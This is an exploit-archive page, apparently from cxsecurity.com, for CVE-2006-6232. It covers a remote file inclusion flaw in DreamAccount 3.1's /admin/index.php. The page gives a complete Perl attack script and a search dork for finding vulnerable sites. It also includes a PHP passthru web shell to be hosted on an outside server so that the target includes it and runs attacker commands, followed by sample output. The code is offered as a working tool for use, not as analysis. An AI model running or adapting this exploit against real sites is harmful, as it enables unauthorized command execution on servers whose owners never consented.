DREAMACCOUNT V3.1 Remote Command Execution Exploit

2006.12.05
Credit: Drago84(Exclusive Security Team)
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-6232
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------- DREAMACCOUNT V3.1 Command Execution Exploit ---------------------------------------------------- Discovered By CrAsh_oVeR_rIdE(Arabian Security Team) Coded By Drago84(Exclusive Security Team) ---------------------------------------------------- site of script:http://dreamcost.com ---------------------------------------------------- Vulnerable: DREAMACCOUNT V3.1 ---------------------------------------------------- vulnerable file : ------------------ /admin/index.php ---------------------------------------------------- vulnerable code: ---------------------------------------------------- require($path . "setup.php"); require($path . "functions.php"); require($path . "payment_processing.inc.php"); $path parameter File inclusion ---------------------------------------------------- #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; print "n===================================================================== ========rn"; print " * Dreamaccount Remote Command Execution 23/06/06 *rn"; print "======================================================================= ======rn"; print "[*] dork:"powered by DreamAccount 3.1"n"; print "[*] Coded By : Drago84 n"; print "[*] Discovered by CrAsH_oVeR_rIdEn"; print "[*] Use <site> <dir_Dream> <eval site> <cmd>n"; print " Into the Eval Site it must be:nn"; print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive"; if (@ARGV < 4) { print "nn[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>n"; print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg idn"; print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) n"; exit(); } my $dir=$ARGV[1]; my $host=$ARGV[0]; my $eval=$ARGV[2]; my $cmd=$ARGV[3]; my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd; print "n"; my $req=HTTP::Request->new(GET=>$url2); my $ua=LWP::UserAgent->new(); $ua->timeout(10); my $response=$ua->request($req); if ($response->is_success) { print "nnResult of:".$cmd."n"; my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)/Exclusive}smx ); printf $1; $response->content; print "n"; } ------------------------------------------------------------------------ ---------------------------- Discovered By CrAsh_oVeR_rIdE Coded By Drago84 E-mail:KARKOR23 (at) hotmail (dot) com [email concealed] Site:www.lezr.com Greetz:KING-HACKER,YOUNG_HACKER ,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr .hcR AND ALL LEZR.COM Member


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top